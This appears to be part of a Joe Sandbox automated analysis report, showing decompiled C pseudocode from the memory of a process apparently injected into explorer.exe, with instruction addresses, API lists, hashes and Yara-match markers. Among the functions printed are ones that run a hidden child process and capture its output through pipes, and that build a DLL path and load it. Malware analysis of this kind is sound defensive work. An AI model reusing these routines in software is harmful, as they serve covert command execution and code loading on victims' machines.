				signed char _t11;
				char** _t19;
				char _t22;
				long long _t32;
				long long _t33;

				_t9 = __eax;
				L000922CD();
				_t19 = _a4;
				_t22 =  *__eax;
				if( *_t22 != 0x2e) {
					_t9 = strchr( *_t19, 0x2e);
					if(_t9 != 0) {
						 *_t9 =  *_t22;
					}
				}
				L00092291();
				 *_t9 =  *_t9 & 0x00000000;
				_t11 = strtod( *_t19,  &_v8);
				asm("fst qword [ebp-0xc]");
				_t32 =  *0x98250;
				asm("fucomp st1");
				asm("fnstsw ax");
				if((_t11 & 0x00000044) != 0) {
					L5:
					st0 = _t32;
					L00092291();
					if( *_t11 != 0x22) {
						_t33 = _v16;
						goto L8;
					} else {
						return _t11 | 0xffffffff;
					}
				} else {
					_t33 =  *0x98258;
					asm("fucomp st1");
					asm("fnstsw ax");
					if((_t11 & 0x00000044) != 0) {
						L8:
						 *_a8 = _t33;
						return 0;
					} else {
						goto L5;
					}
				}
			}











                            0x000921ff
                            0x00092207
                            0x0009220c
                            0x0009220f
                            0x00092214
                            0x0009221a
                            0x00092223
                            0x00092227
                            0x00092227
                            0x00092223
                            0x00092229
                            0x0009222e
                            0x00092237
                            0x0009223c
                            0x0009223f
                            0x00092248
                            0x0009224a
                            0x00092251
                            0x00092262
                            0x00092262
                            0x00092264
                            0x0009226c
                            0x00092273
                            0x00000000
                            0x0009226e
                            0x00092272
                            0x00092272
                            0x00092253
                            0x00092253
                            0x00092259
                            0x0009225b
                            0x00092260
                            0x00092276
                            0x00092279
                            0x0009227e
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00092260

                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: _errno$localeconvstrchrstrtod
                            • String ID:
                            • API String ID: 1035490122-0
                            • Opcode ID: de4c433de47fb25370494944294a547a5aa963e4291e7017832a2afbf295a471
                            • Instruction ID: 9be57ecffa989f7d2828815fae2d17a9d7f4e019258d81125002a8d3572c8328
                            • Opcode Fuzzy Hash: de4c433de47fb25370494944294a547a5aa963e4291e7017832a2afbf295a471
                            • Instruction Fuzzy Hash: 7701F239904205FADF127F24E9057DD7BA8AF4B360F2041D1E9D0A61E2DB759854E7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008A9B7, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 177pipeCOMMON
                            Download Yara Rule
                            C-Code - Quality: 73%
                            			E0008A9B7(signed int __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				signed int _v24;
				char _v28;
				char _v32;
				char _v36;
				struct _SECURITY_ATTRIBUTES _v48;
				intOrPtr _v60;
				char _v64;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				short _v92;
				intOrPtr _v96;
				void _v140;
				intOrPtr _t77;
				void* _t79;
				intOrPtr _t85;
				intOrPtr _t87;
				intOrPtr _t89;
				intOrPtr _t92;
				intOrPtr _t98;
				intOrPtr _t100;
				intOrPtr _t102;
				long _t111;
				intOrPtr _t115;
				intOrPtr _t126;
				void* _t127;
				void* _t128;
				void* _t129;
				void* _t130;

				_t111 = 0;
				_v24 = __ecx;
				_v12 = 0;
				_v20 = 0;
				_t127 = 0;
				_v8 = 0;
				_v16 = 0;
				_v48.nLength = 0xc;
				_v48.lpSecurityDescriptor = 0;
				_v48.bInheritHandle = 1;
				_v28 = 0;
				memset( &_v140, 0, 0x44);
				asm("stosd");
				_t130 = _t129 + 0xc;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				if(CreatePipe( &_v12,  &_v20,  &_v48, 0) == 0) {
					L18:
					return 0;
				}
				if(CreatePipe( &_v8,  &_v16,  &_v48, 0) == 0) {
					L13:
					E0008861A( &_v28, 0);
					if(_v20 != 0) {
						_t77 =  *0x9e684; // 0x286f8f0
						 *((intOrPtr*)(_t77 + 0x30))(_v20);
					}
					if(_v8 != 0) {
						_t115 =  *0x9e684; // 0x286f8f0
						 *((intOrPtr*)(_t115 + 0x30))(_v8);
					}
					return _t111;
				}
				_t79 = _v16;
				_v76 = _t79;
				_v80 = _t79;
				_v84 = _v12;
				_v140 = 0x44;
				_v96 = 0x101;
				_v92 = 0;
				_t126 = E00088604(0x1001);
				_v28 = _t126;
				if(_t126 == 0) {
					goto L18;
				}
				_push( &_v64);
				_push( &_v140);
				_t85 =  *0x9e684; // 0x286f8f0
				_push(0);
				_push(0);
				_push(0x8000000);
				_push(1);
				_push(0);
				_push(0);
				_push(_v24);
				_push(0);
				if( *((intOrPtr*)(_t85 + 0x38))() == 0) {
					goto L13;
				}
				_t87 =  *0x9e684; // 0x286f8f0
				 *((intOrPtr*)(_t87 + 0x30))(_v12);
				_t89 =  *0x9e684; // 0x286f8f0
				 *((intOrPtr*)(_t89 + 0x30))(_v16);
				_v24 = _v24 & 0;
				do {
					_t92 =  *0x9e684; // 0x286f8f0
					_v36 =  *((intOrPtr*)(_t92 + 0x88))(_v8, _t126, 0x1000,  &_v24, 0);
					 *((char*)(_v24 + _t126)) = 0;
					if(_t111 == 0) {
						_t127 = E000891A6(_t126, 0);
					} else {
						_push(0);
						_push(_t126);
						_v32 = _t127;
						_t127 = E00089292(_t127);
						E0008861A( &_v32, 0xffffffff);
						_t130 = _t130 + 0x14;
					}
					_t111 = _t127;
					_v32 = _t127;
				} while (_v36 != 0);
				_push( &_v36);
				_push(E0008C379(_t127));
				_t98 =  *0x9e68c; // 0x286fab8
				_push(_t127);
				if( *((intOrPtr*)(_t98 + 0xb8))() != 0) {
					L12:
					_t100 =  *0x9e684; // 0x286f8f0
					 *((intOrPtr*)(_t100 + 0x30))(_v64);
					_t102 =  *0x9e684; // 0x286f8f0
					 *((intOrPtr*)(_t102 + 0x30))(_v60);
					goto L13;
				}
				_t128 = E00089256(_t127);
				if(_t128 == 0) {
					goto L12;
				}
				E0008861A( &_v32, 0);
				return _t128;
			}




































                            0x0008a9c2
                            0x0008a9c4
                            0x0008a9d0
                            0x0008a9d5
                            0x0008a9d8
                            0x0008a9da
                            0x0008a9dd
                            0x0008a9e0
                            0x0008a9e7
                            0x0008a9ea
                            0x0008a9f1
                            0x0008a9f4
                            0x0008a9fe
                            0x0008a9ff
                            0x0008aa02
                            0x0008aa04
                            0x0008aa05
                            0x0008aa1c
                            0x0008ab9c
                            0x00000000
                            0x0008ab9c
                            0x0008aa33
                            0x0008ab68
                            0x0008ab6e
                            0x0008ab79
                            0x0008ab7b
                            0x0008ab83
                            0x0008ab83
                            0x0008ab8a
                            0x0008ab8c
                            0x0008ab95
                            0x0008ab95
                            0x00000000
                            0x0008ab98
                            0x0008aa39
                            0x0008aa3c
                            0x0008aa3f
                            0x0008aa45
                            0x0008aa4f
                            0x0008aa59
                            0x0008aa60
                            0x0008aa69
                            0x0008aa6b
                            0x0008aa71
                            0x00000000
                            0x00000000
                            0x0008aa7c
                            0x0008aa83
                            0x0008aa84
                            0x0008aa89
                            0x0008aa8a
                            0x0008aa8b
                            0x0008aa90
                            0x0008aa92
                            0x0008aa93
                            0x0008aa94
                            0x0008aa97
                            0x0008aa9d
                            0x00000000
                            0x00000000
                            0x0008aaa3
                            0x0008aaab
                            0x0008aaae
                            0x0008aab6
                            0x0008aab9
                            0x0008aabc
                            0x0008aac2
                            0x0008aad6
                            0x0008aadc
                            0x0008aae2
                            0x0008ab0b
                            0x0008aae4
                            0x0008aae4
                            0x0008aae6
                            0x0008aae8
                            0x0008aaf0
                            0x0008aaf8
                            0x0008aafd
                            0x0008aafd
                            0x0008ab11
                            0x0008ab13
                            0x0008ab13
                            0x0008ab1b
                            0x0008ab23
                            0x0008ab24
                            0x0008ab29
                            0x0008ab32
                            0x0008ab52
                            0x0008ab52
                            0x0008ab5a
                            0x0008ab5d
                            0x0008ab65
                            0x00000000
                            0x0008ab65
                            0x0008ab3b
                            0x0008ab3f
                            0x00000000
                            0x00000000
                            0x0008ab47
                            0x00000000

                            APIs
                            • memset.MSVCRT ref: 0008A9F4
                            • CreatePipe.KERNEL32(?,?,0000000C,00000000,00000000,00000000,00000000), ref: 0008AA18
                            • CreatePipe.KERNEL32(000865A9,?,0000000C,00000000), ref: 0008AA2F
                              • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                              • Part of subcall function 0008861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateHeapPipe$AllocateFreememset
                            • String ID: D
                            • API String ID: 2365139273-2746444292
                            • Opcode ID: 67bc10a6decf753f6dac1e13afc2d66274f75466a29843fca943c411748d35ce
                            • Instruction ID: 1038731307509bc63423b83b895d9a6edc7a8df2068bd220f00375d18a9fab8d
                            • Opcode Fuzzy Hash: 67bc10a6decf753f6dac1e13afc2d66274f75466a29843fca943c411748d35ce
                            • Instruction Fuzzy Hash: 3A512C72E00209AFEB51EFA4CC45FDEBBB9BB08300F14416AF544E7152EB7499048B61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008C4CE, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117libraryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 89%
                            			E0008C4CE(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				void _v140;
				signed char _t14;
				char _t15;
				intOrPtr _t20;
				void* _t25;
				intOrPtr _t26;
				intOrPtr _t32;
				WCHAR* _t34;
				intOrPtr _t35;
				struct HINSTANCE__* _t37;
				int _t38;
				intOrPtr _t46;
				void* _t47;
				intOrPtr _t50;
				void* _t60;
				void* _t61;
				char _t62;
				char* _t63;
				void* _t65;
				intOrPtr _t66;
				char _t68;

				_t65 = __esi;
				_t61 = __edi;
				_t47 = __ebx;
				_t50 =  *0x9e688; // 0xb0000
				_t14 =  *(_t50 + 0x1898);
				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
					_t15 = E000895E1(_t50, 0xb62);
					_t66 =  *0x9e688; // 0xb0000
					_t62 = _t15;
					_t67 = _t66 + 0xb0;
					_v8 = _t62;
					E00089640( &_v140, 0x40, L"%08x", E0008D400(_t66 + 0xb0, E0008C379(_t66 + 0xb0), 0));
					_t20 =  *0x9e688; // 0xb0000
					asm("sbb eax, eax");
					_t25 = E000895E1(_t67, ( ~( *(_t20 + 0xa8)) & 0x00000068) + 0x615);
					_t63 = "\\";
					_t26 =  *0x9e688; // 0xb0000
					_t68 = E000892E5(_t26 + 0x1020);
					_v12 = _t68;
					E000885D5( &_v8);
					_t32 =  *0x9e688; // 0xb0000
					_t34 = E000892E5(_t32 + 0x122a);
					 *0x9e784 = _t34;
					_t35 =  *0x9e684; // 0x286f8f0
					 *((intOrPtr*)(_t35 + 0x110))(_t68, _t34, 0, _t63,  &_v140, ".", L"dll", 0, _t63, _t25, _t63, _t62, 0, _t61, _t65, _t47);
					_t37 = LoadLibraryW( *0x9e784);
					 *0x9e77c = _t37;
					if(_t37 == 0) {
						_t38 = 0;
					} else {
						_push(_t37);
						_t60 = 0x28;
						_t38 = E0008E171(0x9bb48, _t60);
					}
					 *0x9e780 = _t38;
					E0008861A( &_v12, 0xfffffffe);
					memset( &_v140, 0, 0x80);
					if( *0x9e780 != 0) {
						goto L10;
					} else {
						E0008861A(0x9e784, 0xfffffffe);
						goto L8;
					}
				} else {
					L8:
					if( *0x9e780 == 0) {
						_t46 =  *0x9e6bc; // 0x286fa18
						 *0x9e780 = _t46;
					}
					L10:
					return 1;
				}
			}


























                            0x0008c4ce
                            0x0008c4ce
                            0x0008c4ce
                            0x0008c4d1
                            0x0008c4dd
                            0x0008c4e8
                            0x0008c504
                            0x0008c509
                            0x0008c512
                            0x0008c514
                            0x0008c51c
                            0x0008c53d
                            0x0008c542
                            0x0008c54f
                            0x0008c55a
                            0x0008c561
                            0x0008c568
                            0x0008c579
                            0x0008c57f
                            0x0008c582
                            0x0008c599
                            0x0008c5a5
                            0x0008c5ad
                            0x0008c5b4
                            0x0008c5ba
                            0x0008c5c6
                            0x0008c5cc
                            0x0008c5d3
                            0x0008c5e6
                            0x0008c5d5
                            0x0008c5d5
                            0x0008c5d8
                            0x0008c5de
                            0x0008c5e3
                            0x0008c5e8
                            0x0008c5f3
                            0x0008c605
                            0x0008c617
                            0x00000000
                            0x0008c619
                            0x0008c620
                            0x00000000
                            0x0008c626
                            0x0008c627
                            0x0008c627
                            0x0008c62e
                            0x0008c630
                            0x0008c635
                            0x0008c635
                            0x0008c63a
                            0x0008c63e
                            0x0008c63e

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: LibraryLoadmemset
                            • String ID: %08x$dll
                            • API String ID: 3406617148-2963171978
                            • Opcode ID: d0cc9968a293dd3dfd5a1183e1ba6c410fd70592b1cb07f3e9d2906c3aa602dc
                            • Instruction ID: f3dd22374d708548471efb5ddff1d4c344fbc2453a9af2a3a2ac9a4f9c61bf9a
                            • Opcode Fuzzy Hash: d0cc9968a293dd3dfd5a1183e1ba6c410fd70592b1cb07f3e9d2906c3aa602dc
                            • Instruction Fuzzy Hash: BB31B3B2A00244BBFB10FBA8EC89FAA73ACFB54354F544036F145D7192EB789D418725
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00092D70, Relevance: 6.6, APIs: 5, Instructions: 341COMMON
                            Download Yara Rule
                            C-Code - Quality: 99%
                            			E00092D70(int _a4, signed int _a8) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				void* __esi;
				void* _t137;
				signed int _t141;
				intOrPtr* _t142;
				signed int _t145;
				signed int _t146;
				intOrPtr _t151;
				intOrPtr _t161;
				intOrPtr _t162;
				intOrPtr _t167;
				intOrPtr _t170;
				signed int _t172;
				intOrPtr _t173;
				int _t184;
				intOrPtr _t185;
				intOrPtr _t188;
				signed int _t189;
				void* _t195;
				int _t202;
				int _t208;
				intOrPtr _t217;
				signed int _t218;
				int _t219;
				intOrPtr _t220;
				signed int _t221;
				signed int _t222;
				int _t224;
				int _t225;
				signed int _t227;
				intOrPtr _t228;
				int _t232;
				int _t234;
				signed int _t235;
				int _t239;
				void* _t240;
				int _t245;
				int _t252;
				signed int _t253;
				int _t254;
				void* _t257;
				void* _t258;
				int _t259;
				intOrPtr _t260;
				int _t261;
				signed int _t269;
				signed int _t271;
				intOrPtr* _t272;
				void* _t273;

				_t253 = _a8;
				_t272 = _a4;
				_t3 = _t272 + 0xc; // 0x452bf84d
				_t4 = _t272 + 0x2c; // 0x8df075ff
				_t228 =  *_t4;
				_t137 =  *_t3 + 0xfffffffb;
				_t229 =  <=  ? _t137 : _t228;
				_v16 =  <=  ? _t137 : _t228;
				_t269 = 0;
				_a4 =  *((intOrPtr*)( *_t272 + 4));
				asm("o16 nop [eax+eax]");
				while(1) {
					_t8 = _t272 + 0x16bc; // 0x8b3c7e89
					_t141 =  *_t8 + 0x2a >> 3;
					_v12 = 0xffff;
					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
					if(_t217 < _t141) {
						break;
					}
					_t11 = _t272 + 0x6c; // 0xa1ec8b55
					_t12 = _t272 + 0x5c; // 0x84e85000
					_t245 =  *_t11 -  *_t12;
					_v8 = _t245;
					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
					_t247 =  <  ? _t195 : _v12;
					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
					if(_t227 >= _v16) {
						L7:
						if(_t253 != 4) {
							L10:
							_t269 = 0;
							__eflags = 0;
						} else {
							_t285 = _t227 - _t195;
							if(_t227 != _t195) {
								goto L10;
							} else {
								_t269 = _t253 - 3;
							}
						}
						E00095D90(_t272, _t272, 0, 0, _t269);
						_t18 = _t272 + 0x14; // 0xc703f045
						_t19 = _t272 + 8; // 0x8d000040
						 *( *_t18 +  *_t19 - 4) = _t227;
						_t22 = _t272 + 0x14; // 0xc703f045
						_t23 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
						_t26 = _t272 + 0x14; // 0xc703f045
						_t27 = _t272 + 8; // 0x8d000040
						 *( *_t26 +  *_t27 - 2) =  !_t227;
						_t30 = _t272 + 0x14; // 0xc703f045
						_t31 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
						E00094AF0(_t285,  *_t272);
						_t202 = _v8;
						_t273 = _t273 + 0x14;
						if(_t202 != 0) {
							_t208 =  >  ? _t227 : _t202;
							_v8 = _t208;
							_t36 = _t272 + 0x38; // 0xf47d8bff
							_t37 = _t272 + 0x5c; // 0x84e85000
							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
							_t273 = _t273 + 0xc;
							_t252 = _v8;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
							_t227 = _t227 - _t252;
						}
						if(_t227 != 0) {
							E00094C30( *_t272,  *( *_t272 + 0xc), _t227);
							_t273 = _t273 + 0xc;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
						}
						_t253 = _a8;
						if(_t269 == 0) {
							continue;
						}
					} else {
						if(_t227 != 0 || _t253 == 4) {
							if(_t253 != 0 && _t227 == _t195) {
								goto L7;
							}
						}
					}
					break;
				}
				_t142 =  *_t272;
				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
				_a4 = _t232;
				if(_t232 == 0) {
					_t83 = _t272 + 0x6c; // 0xa1ec8b55
					_t254 =  *_t83;
				} else {
					_t59 = _t272 + 0x2c; // 0x8df075ff
					_t224 =  *_t59;
					if(_t232 < _t224) {
						_t65 = _t272 + 0x3c; // 0x830cc483
						_t66 = _t272 + 0x6c; // 0xa1ec8b55
						_t260 =  *_t66;
						__eflags =  *_t65 - _t260 - _t232;
						if( *_t65 - _t260 <= _t232) {
							_t67 = _t272 + 0x38; // 0xf47d8bff
							_t261 = _t260 - _t224;
							 *(_t272 + 0x6c) = _t261;
							memcpy( *_t67,  *_t67 + _t224, _t261);
							_t70 = _t272 + 0x16b0; // 0xdf750008
							_t188 =  *_t70;
							_t273 = _t273 + 0xc;
							_t232 = _a4;
							__eflags = _t188 - 2;
							if(_t188 < 2) {
								_t189 = _t188 + 1;
								__eflags = _t189;
								 *(_t272 + 0x16b0) = _t189;
							}
						}
						_t73 = _t272 + 0x38; // 0xf47d8bff
						_t74 = _t272 + 0x6c; // 0xa1ec8b55
						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
						_t225 = _a4;
						_t273 = _t273 + 0xc;
						_t76 = _t272 + 0x6c;
						 *_t76 =  *(_t272 + 0x6c) + _t225;
						__eflags =  *_t76;
						_t78 = _t272 + 0x6c; // 0xa1ec8b55
						_t184 =  *_t78;
						_t79 = _t272 + 0x2c; // 0x8df075ff
						_t239 =  *_t79;
					} else {
						 *(_t272 + 0x16b0) = 2;
						_t61 = _t272 + 0x38; // 0xf47d8bff
						memcpy( *_t61,  *_t142 - _t224, _t224);
						_t62 = _t272 + 0x2c; // 0x8df075ff
						_t184 =  *_t62;
						_t273 = _t273 + 0xc;
						_t225 = _a4;
						_t239 = _t184;
						 *(_t272 + 0x6c) = _t184;
					}
					_t254 = _t184;
					 *(_t272 + 0x5c) = _t184;
					_t81 = _t272 + 0x16b4; // 0xe9ffcb83
					_t185 =  *_t81;
					_t240 = _t239 - _t185;
					_t241 =  <=  ? _t225 : _t240;
					_t242 = ( <=  ? _t225 : _t240) + _t185;
					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
				}
				if( *(_t272 + 0x16c0) < _t254) {
					 *(_t272 + 0x16c0) = _t254;
				}
				if(_t269 == 0) {
					_t218 = _a8;
					__eflags = _t218;
					if(_t218 == 0) {
						L34:
						_t89 = _t272 + 0x3c; // 0x830cc483
						_t219 =  *_t272;
						_t145 =  *_t89 - _t254 - 1;
						_a4 =  *_t272;
						_t234 = _t254;
						_v16 = _t145;
						_v8 = _t254;
						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
							_v8 = _t254;
							_t95 = _t272 + 0x5c; // 0x84e85000
							_a4 = _t219;
							_t234 = _t254;
							_t97 = _t272 + 0x2c; // 0x8df075ff
							__eflags =  *_t95 -  *_t97;
							if( *_t95 >=  *_t97) {
								_t98 = _t272 + 0x2c; // 0x8df075ff
								_t167 =  *_t98;
								_t259 = _t254 - _t167;
								_t99 = _t272 + 0x38; // 0xf47d8bff
								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
								 *(_t272 + 0x6c) = _t259;
								memcpy( *_t99, _t167 +  *_t99, _t259);
								_t103 = _t272 + 0x16b0; // 0xdf750008
								_t170 =  *_t103;
								_t273 = _t273 + 0xc;
								__eflags = _t170 - 2;
								if(_t170 < 2) {
									_t172 = _t170 + 1;
									__eflags = _t172;
									 *(_t272 + 0x16b0) = _t172;
								}
								_t106 = _t272 + 0x2c; // 0x8df075ff
								_t145 = _v16 +  *_t106;
								__eflags = _t145;
								_a4 =  *_t272;
								_t108 = _t272 + 0x6c; // 0xa1ec8b55
								_t234 =  *_t108;
								_v8 = _t234;
							}
						}
						_t255 = _a4;
						_t220 =  *((intOrPtr*)(_a4 + 4));
						__eflags = _t145 - _t220;
						_t221 =  <=  ? _t145 : _t220;
						_t146 = _t221;
						_a4 = _t221;
						_t222 = _a8;
						__eflags = _t146;
						if(_t146 != 0) {
							_t114 = _t272 + 0x38; // 0xf47d8bff
							E00094C30(_t255,  *_t114 + _v8, _t146);
							_t273 = _t273 + 0xc;
							_t117 = _t272 + 0x6c;
							 *_t117 =  *(_t272 + 0x6c) + _a4;
							__eflags =  *_t117;
							_t119 = _t272 + 0x6c; // 0xa1ec8b55
							_t234 =  *_t119;
						}
						__eflags =  *(_t272 + 0x16c0) - _t234;
						if( *(_t272 + 0x16c0) < _t234) {
							 *(_t272 + 0x16c0) = _t234;
						}
						_t122 = _t272 + 0x16bc; // 0x8b3c7e89
						_t123 = _t272 + 0xc; // 0x452bf84d
						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
						__eflags = _t257 - 0xffff;
						_t258 =  >  ? 0xffff : _t257;
						_t124 = _t272 + 0x2c; // 0x8df075ff
						_t151 =  *_t124;
						_t125 = _t272 + 0x5c; // 0x84e85000
						_t235 = _t234 -  *_t125;
						__eflags = _t258 - _t151;
						_t152 =  <=  ? _t258 : _t151;
						__eflags = _t235 - ( <=  ? _t258 : _t151);
						if(_t235 >= ( <=  ? _t258 : _t151)) {
							L49:
							__eflags = _t235 - _t258;
							_t154 =  >  ? _t258 : _t235;
							_a4 =  >  ? _t258 : _t235;
							__eflags = _t222 - 4;
							if(_t222 != 4) {
								L53:
								_t269 = 0;
								__eflags = 0;
							} else {
								_t161 =  *_t272;
								__eflags =  *(_t161 + 4);
								_t154 = _a4;
								if( *(_t161 + 4) != 0) {
									goto L53;
								} else {
									__eflags = _t154 - _t235;
									if(_t154 != _t235) {
										goto L53;
									} else {
										_t269 = _t222 - 3;
									}
								}
							}
							_t131 = _t272 + 0x38; // 0xf47d8bff
							_t132 = _t272 + 0x5c; // 0x84e85000
							E00095D90(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
							_t134 = _t272 + 0x5c;
							 *_t134 =  *(_t272 + 0x5c) + _a4;
							__eflags =  *_t134;
							E00094AF0( *_t134,  *_t272);
						} else {
							__eflags = _t235;
							if(_t235 != 0) {
								L46:
								__eflags = _t222;
								if(_t222 != 0) {
									_t162 =  *_t272;
									__eflags =  *(_t162 + 4);
									if( *(_t162 + 4) == 0) {
										__eflags = _t235 - _t258;
										if(_t235 <= _t258) {
											goto L49;
										}
									}
								}
							} else {
								__eflags = _t222 - 4;
								if(_t222 == 4) {
									goto L46;
								}
							}
						}
						asm("sbb edi, edi");
						_t271 =  ~_t269 & 0x00000002;
						__eflags = _t271;
						return _t271;
					} else {
						__eflags = _t218 - 4;
						if(_t218 == 4) {
							goto L34;
						} else {
							_t173 =  *_t272;
							__eflags =  *(_t173 + 4);
							if( *(_t173 + 4) != 0) {
								goto L34;
							} else {
								_t88 = _t272 + 0x5c; // 0x84e85000
								__eflags = _t254 -  *_t88;
								if(_t254 !=  *_t88) {
									goto L34;
								} else {
									return 1;
								}
							}
						}
					}
				} else {
					return 3;
				}
			}






















































                            0x00092d76
                            0x00092d7b
                            0x00092d7f
                            0x00092d82
                            0x00092d82
                            0x00092d85
                            0x00092d8a
                            0x00092d8f
                            0x00092d92
                            0x00092d97
                            0x00092d9a
                            0x00092da0
                            0x00092da0
                            0x00092dab
                            0x00092dae
                            0x00092db5
                            0x00092dba
                            0x00000000
                            0x00000000
                            0x00092dc0
                            0x00092dc5
                            0x00092dc5
                            0x00092dca
                            0x00092dd0
                            0x00092dda
                            0x00092ddf
                            0x00092de5
                            0x00092e04
                            0x00092e07
                            0x00092e12
                            0x00092e12
                            0x00092e12
                            0x00092e09
                            0x00092e09
                            0x00092e0b
                            0x00000000
                            0x00092e0d
                            0x00092e0d
                            0x00092e0d
                            0x00092e0b
                            0x00092e1a
                            0x00092e1f
                            0x00092e24
                            0x00092e2a
                            0x00092e2e
                            0x00092e31
                            0x00092e34
                            0x00092e3a
                            0x00092e3f
                            0x00092e42
                            0x00092e48
                            0x00092e4d
                            0x00092e53
                            0x00092e59
                            0x00092e5e
                            0x00092e61
                            0x00092e66
                            0x00092e6a
                            0x00092e6e
                            0x00092e71
                            0x00092e74
                            0x00092e7d
                            0x00092e84
                            0x00092e87
                            0x00092e8a
                            0x00092e8f
                            0x00092e94
                            0x00092e97
                            0x00092e9a
                            0x00092e9a
                            0x00092e9e
                            0x00092ea7
                            0x00092eae
                            0x00092eb1
                            0x00092eb6
                            0x00092ebb
                            0x00092ebb
                            0x00092ebe
                            0x00092ec3
                            0x00000000
                            0x00000000
                            0x00092de7
                            0x00092de9
                            0x00092df6
                            0x00000000
                            0x00000000
                            0x00092df6
                            0x00092de9
                            0x00000000
                            0x00092de5
                            0x00092ec9
                            0x00092ece
                            0x00092ed1
                            0x00092ed4
                            0x00092f7f
                            0x00092f7f
                            0x00092eda
                            0x00092eda
                            0x00092eda
                            0x00092edf
                            0x00092f09
                            0x00092f0c
                            0x00092f0c
                            0x00092f11
                            0x00092f13
                            0x00092f15
                            0x00092f18
                            0x00092f1b
                            0x00092f23
                            0x00092f28
                            0x00092f28
                            0x00092f2e
                            0x00092f31
                            0x00092f34
                            0x00092f37
                            0x00092f39
                            0x00092f39
                            0x00092f3a
                            0x00092f3a
                            0x00092f37
                            0x00092f48
                            0x00092f4b
                            0x00092f4f
                            0x00092f54
                            0x00092f57
                            0x00092f5a
                            0x00092f5a
                            0x00092f5a
                            0x00092f5d
                            0x00092f5d
                            0x00092f60
                            0x00092f60
                            0x00092ee1
                            0x00092ee1
                            0x00092ef1
                            0x00092ef4
                            0x00092ef9
                            0x00092ef9
                            0x00092efc
                            0x00092eff
                            0x00092f02
                            0x00092f04
                            0x00092f04
                            0x00092f63
                            0x00092f65
                            0x00092f68
                            0x00092f68
                            0x00092f6e
                            0x00092f72
                            0x00092f75
                            0x00092f77
                            0x00092f77
                            0x00092f88
                            0x00092f8a
                            0x00092f8a
                            0x00092f92
                            0x00092fa0
                            0x00092fa3
                            0x00092fa5
                            0x00092fc5
                            0x00092fc5
                            0x00092fc8
                            0x00092fce
                            0x00092fcf
                            0x00092fd2
                            0x00092fd4
                            0x00092fd7
                            0x00092fda
                            0x00092fdd
                            0x00092fe1
                            0x00092fe4
                            0x00092fe7
                            0x00092fea
                            0x00092fec
                            0x00092fec
                            0x00092fef
                            0x00092ff1
                            0x00092ff1
                            0x00092ff4
                            0x00092ff6
                            0x00092ff9
                            0x00093001
                            0x00093004
                            0x00093009
                            0x00093009
                            0x0009300f
                            0x00093012
                            0x00093015
                            0x00093017
                            0x00093017
                            0x00093018
                            0x00093018
                            0x00093023
                            0x00093023
                            0x00093023
                            0x00093026
                            0x00093029
                            0x00093029
                            0x0009302c
                            0x0009302c
                            0x00092fef
                            0x0009302f
                            0x00093032
                            0x00093035
                            0x00093037
                            0x0009303a
                            0x0009303c
                            0x0009303f
                            0x00093042
                            0x00093044
                            0x00093047
                            0x0009304f
                            0x00093057
                            0x0009305a
                            0x0009305a
                            0x0009305a
                            0x0009305d
                            0x0009305d
                            0x0009305d
                            0x00093060
                            0x00093066
                            0x00093068
                            0x00093068
                            0x0009306e
                            0x00093074
                            0x0009307d
                            0x00093084
                            0x00093086
                            0x00093089
                            0x00093089
                            0x0009308c
